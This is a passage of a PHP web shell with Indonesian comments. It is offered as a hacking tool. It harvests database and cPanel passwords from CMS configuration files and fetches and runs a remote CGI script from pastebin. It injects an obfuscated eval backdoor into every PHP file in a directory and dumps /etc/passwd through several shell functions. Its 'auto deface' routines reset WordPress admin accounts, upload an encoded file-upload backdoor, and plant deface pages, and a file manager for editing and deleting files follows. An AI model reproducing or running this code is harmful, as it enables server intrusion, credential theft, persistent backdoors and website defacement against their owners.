3470. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
3471. $pass .= ambilkata($ambil,"password = '","'")."\n";
3472. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
3473. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
3474. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
3475. $pass .= ambilkata($ambil,'password = "','"')."\n";
3476. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
3477. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
3478. } elseif(preg_match("/client/", $ambil)) {
3479. preg_match("/password=(.*)/", $ambil, $pass1);
3480. if(preg_match('/"/', $pass1[1])) {
3481. $pass1[1] = str_replace('"', "", $pass1[1]);
3482. $pass .= $pass1[1]."\n";
3483. }
3484. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
3485. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
3486. }
3487. }
3488. echo $pass;
3489. }
3490. $cp_pass = cp_pass($dir);
3491. echo $cp_pass;
3492. echo "</textarea><br>
3493. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
3494. </form>
3495. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
3496. }
3497. }
3498. elseif($_GET['do'] == 'cgi') {
3499. $cgi_dir = mkdir('idx_cgi', 0755);
3500. $file_cgi = "idx_cgi/cgi.izo";
3501. $isi_htcgi = "AddHandler cgi-script .izo";
3502. $htcgi = fopen(".htaccess", "w");
3503. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
3504. $cgi = fopen($file_cgi, "w");
3505. fwrite($cgi, $cgi_script);
3506. fwrite($htcgi, $isi_htcgi);
3507. chmod($file_cgi, 0755);
3508. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
3509. } elseif($_GET['do'] == 'fake_root') {
3510. ob_start();
3511. function reverse($url) {
3512. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
3513. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
3514. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
3515. curl_setopt($ch, CURLOPT_HEADER, 0);
3516. curl_setopt($ch, CURLOPT_POST, 1);
3517. $resp = curl_exec($ch);
3518. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
3519. $array = explode(",,", $resp);
3520. unset($array[0]);
3521. foreach($array as $lnk) {
3522. $lnk = "http://$lnk";
3523. $lnk = str_replace(",", "", $lnk);
3524. echo $lnk."\n";
3525. ob_flush();
3526. flush();
3527. }
3528. curl_close($ch);
3529. }
3530. function cek($url) {
3531. $ch = curl_init($url);
3532. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
3533. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
3534. $resp = curl_exec($ch);
3535. return $resp;
3536. }
3537. $cwd = getcwd();
3538. $ambil_user = explode("/", $cwd);
3539. $user = $ambil_user[2];
3540. if($_POST['reverse']) {
3541. $site = explode("\r\n", $_POST['url']);
3542. $file = $_POST['file'];
3543. foreach($site as $url) {
3544. $cek = cek("$url/~$user/$file");
3545. if(preg_match("/hacked/i", $cek)) {
3546. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
3547. }
3548. }
3549. } else {
3550. echo "<center><form method='post'>
3551. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
3552. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
3553. Domain: <br>
3554. <textarea style='width: 450px; height: 250px;' name='url'>";
3555. reverse($_SERVER['HTTP_HOST']);
3556. echo "</textarea><br>
3557. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
3558. </form><br>
3559. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
3560. }
3561. } elseif($_GET['do'] == 'adminer') {
3562. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
3563. function adminer($url, $isi) {
3564. $fp = fopen($isi, "w");
3565. $ch = curl_init();
3566. curl_setopt($ch, CURLOPT_URL, $url);
3567. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
3568. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
3569. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
3570. curl_setopt($ch, CURLOPT_FILE, $fp);
3571. return curl_exec($ch);
3572. curl_close($ch);
3573. fclose($fp);
3574. ob_flush();
3575. flush();
3576. }
3577. if(file_exists('adminer.php')) {
3578. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
3579. } else {
3580. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
3581. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
3582. } else {
3583. echo "<center><font color=red>gagal buat file adminer</font></center>";
3584. }
3585. }
3586. }elseif($_GET['do'] == 'injectcode') {?><center>
3587. <form method='POST'>
3588. <table>
3589. <tr>
3590. <td width="100" class="title">
3591. Directory
3592. </td>
3593. <td>
3594. <input type='text' style="width: 400px;" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
3595. </td>
3596.  
3597. </tr>
3598. <tr>
3599. <td class="title">
3600. Mode
3601. </td>
3602. <td>
3603. <select style="width: 400px;" name="mode" class="box">
3604. <option value="Apender">Apender</option>
3605. <option value="Overwriter">Overwriter</option>
3606. </select>
3607. </td>
3608. </tr>
3609. <tr>
3610. <td class="title">
3611. File Type
3612. </td>
3613. <td>
3614. <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
3615. </td>
3616. </tr>
3617. <tr>
3618. <td>Create A backdoor by injecting this code in every php file of current directory</td>
3619. </tr>
3620.  
3621. <tr>
3622. <td colspan="2">
3623. <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHANCmV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoInkwelRVSWwzZHcySlZrcFVpdFdzVGkxTHpORklyOHJNUzh0SkxFblZTRW9zVGpVemlVOUpUYzVQU2RWSXk4eEpqVTlQTFlsUHpzOHJTYzByS2RaUXlpZ3BLYkRTMXk5SUxDNUpUY3JNMDB2T3o5VXZTaXpYVC9VemN5d3NUTXhXMGdRQzYxb0EiKSkpOw0KPz4="); ?></textarea>
3624. </td>
3625. </tr>
3626. <tr>
3627. <td rowspan="2">
3628. <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="Inject "/>
3629. </td>
3630. </tr>
3631. </form>
3632. </table><div id="showinject"</div> <?php
3633. $filetype = $_POST['filetype'];
3634. $mode = "a";
3635. if($_POST['mode'] == 'Apender')
3636. $mode = "a";
3637. if($_POST['mode'] == 'Overwriter')
3638. $mode = "w";
3639. if (is_dir($_POST['pathtomass']))
3640. {
3641. $lolinject = $_POST['injectthis'];
3642. $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
3643. if(substr($_POST['pathtomass'], -1) == "\\")
3644. $mypath = $_POST['pathtomass'] . "*.".$filetype;
3645. foreach (glob($mypath) as $injectj00)
3646. {
3647. if($injectj00 == __FILE__)
3648. continue;
3649. $fp=fopen($injectj00,$mode);
3650. if (fputs($fp,$lolinject))
3651. echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
3652. else
3653. echo 'failed to inject '.$injectj00.'<br>';
3654. }
3655. }
3656. else
3657. echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
3658. }
3659.  
3660. elseif($_GET['do'] == 'passwbypass') {
3661. echo '<center>Bypass etc/passw With:<br>
3662. <table style="width:50%">
3663. <tr>
3664. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
3665. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
3666. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
3667. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
3668. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
3669. </tr></table>Bypass User With : <table style="width:50%">
3670. <tr>
3671. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
3672. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
3673. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
3674. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
3675. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
3676. </tr>
3677. </table><br>';
3678.  
3679.  
3680. if ($_POST['awkuser']) {
3681. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3682. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
3683. echo "</textarea><br>";
3684. }
3685. if ($_POST['systuser']) {
3686. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3687. echo system("ls /var/mail");
3688. echo "</textarea><br>";
3689. }
3690. if ($_POST['passthuser']) {
3691. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3692. echo passthru("ls /var/mail");
3693. echo "</textarea><br>";
3694. }
3695. if ($_POST['exuser']) {
3696. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3697. echo exec("ls /var/mail");
3698. echo "</textarea><br>";
3699. }
3700. if ($_POST['shexuser']) {
3701. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3702. echo shell_exec("ls /var/mail");
3703. echo "</textarea><br>";
3704. }
3705. if($_POST['syst'])
3706. {
3707. echo"<textarea class='inputz' cols='65' rows='15'>";
3708. echo system("cat /etc/passwd");
3709. echo"</textarea><br><br><b></b><br>";
3710. }
3711. if($_POST['passth'])
3712. {
3713. echo"<textarea class='inputz' cols='65' rows='15'>";
3714. echo passthru("cat /etc/passwd");
3715. echo"</textarea><br><br><b></b><br>";
3716. }
3717. if($_POST['ex'])
3718. {
3719. echo"<textarea class='inputz' cols='65' rows='15'>";
3720. echo exec("cat /etc/passwd");
3721. echo"</textarea><br><br><b></b><br>";
3722. }
3723. if($_POST['shex'])
3724. {
3725. echo"<textarea class='inputz' cols='65' rows='15'>";
3726. echo shell_exec("cat /etc/passwd");
3727. echo"</textarea><br><br><b></b><br>";
3728. }
3729. echo '<center>';
3730. if($_POST['melex'])
3731. {
3732. echo"<textarea class='inputz' cols='65' rows='15'>";
3733. for($uid=0;$uid<60000;$uid++){
3734. $ara = posix_getpwuid($uid);
3735. if (!empty($ara)) {
3736. while (list ($key, $val) = each($ara)){
3737. print "$val:";
3738. }
3739. print "\n";
3740. }
3741. }
3742. echo"</textarea><br><br>";
3743. }
3744. //
3745.  
3746. //
3747. } elseif($_GET['do'] == 'auto_dwp') {
3748. if($_POST['auto_deface_wp']) {
3749. function anucurl($sites) {
3750. $ch = curl_init($sites);
3751. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3752. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3753. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3754. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
3755. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3756. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3757. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3758. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3759. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3760. $data = curl_exec($ch);
3761. curl_close($ch);
3762. return $data;
3763. }
3764. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
3765. $post = array(
3766. "log" => "$userr",
3767. "pwd" => "$pass",
3768. "rememberme" => "forever",
3769. "wp-submit" => "$wp_submit",
3770. "redirect_to" => "$web",
3771. "testcookie" => "1",
3772. );
3773. $ch = curl_init($cek);
3774. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3775. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3776. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3777. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3778. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3779. curl_setopt($ch, CURLOPT_POST, 1);
3780. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
3781. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3782. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3783. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3784. $data = curl_exec($ch);
3785. curl_close($ch);
3786. return $data;
3787. }
3788. $scan = $_POST['link_config'];
3789. $link_config = scandir($scan);
3790. $script = htmlspecialchars($_POST['script']);
3791. $user = "achonx";
3792. $pass = "achonx";
3793. $passx = md5($pass);
3794. foreach($link_config as $dir_config) {
3795. if(!is_file("$scan/$dir_config")) continue;
3796. $config = file_get_contents("$scan/$dir_config");
3797. if(preg_match("/WordPress/", $config)) {
3798. $dbhost = ambilkata($config,"DB_HOST', '","'");
3799. $dbuser = ambilkata($config,"DB_USER', '","'");
3800. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3801. $dbname = ambilkata($config,"DB_NAME', '","'");
3802. $dbprefix = ambilkata($config,"table_prefix = '","'");
3803. $prefix = $dbprefix."users";
3804. $option = $dbprefix."options";
3805. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3806. $db = mysql_select_db($dbname);
3807. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3808. $result = mysql_fetch_array($q);
3809. $id = $result[ID];
3810. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3811. $result2 = mysql_fetch_array($q2);
3812. $target = $result2[option_value];
3813. if($target == '') {
3814. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
3815. } else {
3816. echo "[+] $target <br>";
3817. }
3818. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
3819. if(!$conn OR !$db OR !$update) {
3820. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
3821. mysql_close($conn);
3822. } else {
3823. $site = "$target/wp-login.php";
3824. $site2 = "$target/wp-admin/theme-install.php?upload";
3825. $b1 = anucurl($site2);
3826. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
3827. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
3828. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
3829. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
3830. $www = "m.php";
3831. $fp5 = fopen($www,"w");
3832. fputs($fp5,$upload3);
3833. $post2 = array(
3834. "_wpnonce" => "$anu2",
3835. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
3836. "themezip" => "@$www",
3837. "install-theme-submit" => "Install Now",
3838. );
3839. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
3840. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3841. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3842. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3843. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3844. curl_setopt($ch, CURLOPT_POST, 1);
3845. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
3846. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3847. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3848. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3849. $data3 = curl_exec($ch);
3850. curl_close($ch);
3851. $y = date("Y");
3852. $m = date("m");
3853. $namafile = "id.php";
3854. $fpi = fopen($namafile,"w");
3855. fputs($fpi,$script);
3856. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
3857. curl_setopt($ch6, CURLOPT_POST, true);
3858. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
3859. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
3860. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
3861. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
3862. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
3863. $postResult = curl_exec($ch6);
3864. curl_close($ch6);
3865. $as = "$target/k.php";
3866. $bs = anucurl($as);
3867. if(preg_match("#$script#is", $bs)) {
3868. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
3869. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
3870. } else {
3871. echo "[-] <font color='red'>gagal mepes...</font><br>";
3872. echo "[!!] coba aja manual: <br>";
3873. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
3874. echo "[+] username: <font color=lime>$user</font><br>";
3875. echo "[+] password: <font color=lime>$pass</font><br><br>";
3876. }
3877. mysql_close($conn);
3878. }
3879. }
3880. }
3881. } else {
3882. echo "<center><h1>WordPress Auto Deface</h1>
3883. <form method='post'>
3884. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
3885. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Achon666ju5t' required><br>
3886. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
3887. </form>
3888. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
3889. </center>";
3890. }
3891. } elseif($_GET['do'] == 'auto_dwp2') {
3892. if($_POST['auto_deface_wp']) {
3893. function anucurl($sites) {
3894. $ch = curl_init($sites);
3895. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3896. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3897. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3898. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
3899. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3900. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3901. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3902. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3903. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
3904. $data = curl_exec($ch);
3905. curl_close($ch);
3906. return $data;
3907. }
3908. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
3909. $post = array(
3910. "log" => "$userr",
3911. "pwd" => "$pass",
3912. "rememberme" => "forever",
3913. "wp-submit" => "$wp_submit",
3914. "redirect_to" => "$web",
3915. "testcookie" => "1",
3916. );
3917. $ch = curl_init($cek);
3918. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3919. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3920. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3921. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3922. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3923. curl_setopt($ch, CURLOPT_POST, 1);
3924. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
3925. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3926. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3927. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3928. $data = curl_exec($ch);
3929. curl_close($ch);
3930. return $data;
3931. }
3932. $link = explode("\r\n", $_POST['link']);
3933. $script = htmlspecialchars($_POST['script']);
3934. $user = "indoxploit";
3935. $pass = "indoxploit";
3936. $passx = md5($pass);
3937. foreach($link as $dir_config) {
3938. $config = anucurl($dir_config);
3939. $dbhost = ambilkata($config,"DB_HOST', '","'");
3940. $dbuser = ambilkata($config,"DB_USER', '","'");
3941. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3942. $dbname = ambilkata($config,"DB_NAME', '","'");
3943. $dbprefix = ambilkata($config,"table_prefix = '","'");
3944. $prefix = $dbprefix."users";
3945. $option = $dbprefix."options";
3946. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3947. $db = mysql_select_db($dbname);
3948. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3949. $result = mysql_fetch_array($q);
3950. $id = $result[ID];
3951. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3952. $result2 = mysql_fetch_array($q2);
3953. $target = $result2[option_value];
3954. if($target == '') {
3955. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
3956. } else {
3957. echo "[+] $target <br>";
3958. }
3959. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
3960. if(!$conn OR !$db OR !$update) {
3961. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
3962. mysql_close($conn);
3963. } else {
3964. $site = "$target/wp-login.php";
3965. $site2 = "$target/wp-admin/theme-install.php?upload";
3966. $b1 = anucurl($site2);
3967. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
3968. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
3969. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
3970. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
3971. $www = "m.php";
3972. $fp5 = fopen($www,"w");
3973. fputs($fp5,$upload3);
3974. $post2 = array(
3975. "_wpnonce" => "$anu2",
3976. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
3977. "themezip" => "@$www",
3978. "install-theme-submit" => "Install Now",
3979. );
3980. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
3981. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3982. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3983. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3984. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3985. curl_setopt($ch, CURLOPT_POST, 1);
3986. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
3987. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3988. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3989. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3990. $data3 = curl_exec($ch);
3991. curl_close($ch);
3992. $y = date("Y");
3993. $m = date("m");
3994. $namafile = "id.php";
3995. $fpi = fopen($namafile,"w");
3996. fputs($fpi,$script);
3997. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
3998. curl_setopt($ch6, CURLOPT_POST, true);
3999. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
4000. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
4001. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
4002. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
4003. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
4004. $postResult = curl_exec($ch6);
4005. curl_close($ch6);
4006. $as = "$target/k.php";
4007. $bs = anucurl($as);
4008. if(preg_match("#$script#is", $bs)) {
4009. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
4010. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
4011. } else {
4012. echo "[-] <font color='red'>gagal mepes...</font><br>";
4013. echo "[!!] coba aja manual: <br>";
4014. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
4015. echo "[+] username: <font color=lime>$user</font><br>";
4016. echo "[+] password: <font color=lime>$pass</font><br><br>";
4017. }
4018. mysql_close($conn);
4019. }
4020. }
4021. } else {
4022. echo "<center><h1>WordPress Auto Deface V.2</h1>
4023. <form method='post'>
4024. Link Config: <br>
4025. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
4026. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Achon666ju5t' required><br>
4027. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
4028. </form></center>";
4029. }
4030. } elseif($_GET['act'] == 'newfile') {
4031. if($_POST['new_save_file']) {
4032. $newfile = htmlspecialchars($_POST['newfile']);
4033. $fopen = fopen($newfile, "a+");
4034. if($fopen) {
4035. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
4036. } else {
4037. $act = "<font color=red>permission denied</font>";
4038. }
4039. }
4040. echo $act;
4041. echo "<form method='post'>
4042. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
4043. <input type='submit' name='new_save_file' value='Submit'>
4044. </form>";
4045. } elseif($_GET['act'] == 'newfolder') {
4046. if($_POST['new_save_folder']) {
4047. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
4048. if(!mkdir($new_folder)) {
4049. $act = "<font color=red>permission denied</font>";
4050. } else {
4051. $act = "<script>window.location='?dir=".$dir."';</script>";
4052. }
4053. }
4054. echo $act;
4055. echo "<form method='post'>
4056. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
4057. <input type='submit' name='new_save_folder' value='Submit'>
4058. </form>";
4059. } elseif($_GET['act'] == 'rename_dir') {
4060. if($_POST['dir_rename']) {
4061. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
4062. if($dir_rename) {
4063. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4064. } else {
4065. $act = "<font color=red>permission denied</font>";
4066. }
4067. echo "".$act."<br>";
4068. }
4069. echo "<form method='post'>
4070. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
4071. <input type='submit' name='dir_rename' value='rename'>
4072. </form>";
4073. } elseif($_GET['act'] == 'delete_dir') {
4074. function Delete($path)
4075. {
4076. if (is_dir($path) === true)
4077. {
4078. $files = array_diff(scandir($path), array('.', '..'));
4079. foreach ($files as $file)
4080. {
4081. Delete(realpath($path) . '/' . $file);
4082. }
4083. return rmdir($path);
4084. }
4085. else if (is_file($path) === true)
4086. {
4087. return unlink($path);
4088. }
4089. return false;
4090. }
4091. $delete_dir = Delete($dir);
4092. if($delete_dir) {
4093. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4094. } else {
4095. $act = "<font color=red>could not remove ".basename($dir)."</font>";
4096. }
4097. echo $act;
4098. } elseif($_GET['act'] == 'view') {
4099. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
4100. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
4101. } elseif($_GET['act'] == 'edit') {
4102. if($_POST['save']) {
4103. $save = file_put_contents($_GET['file'], $_POST['src']);
4104. if($save) {
4105. $act = "<font color=lime>Saved!</font>";
4106. } else {
4107. $act = "<font color=red>permission denied</font>";
4108. }
4109. echo "".$act."<br>";
4110. }
4111. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
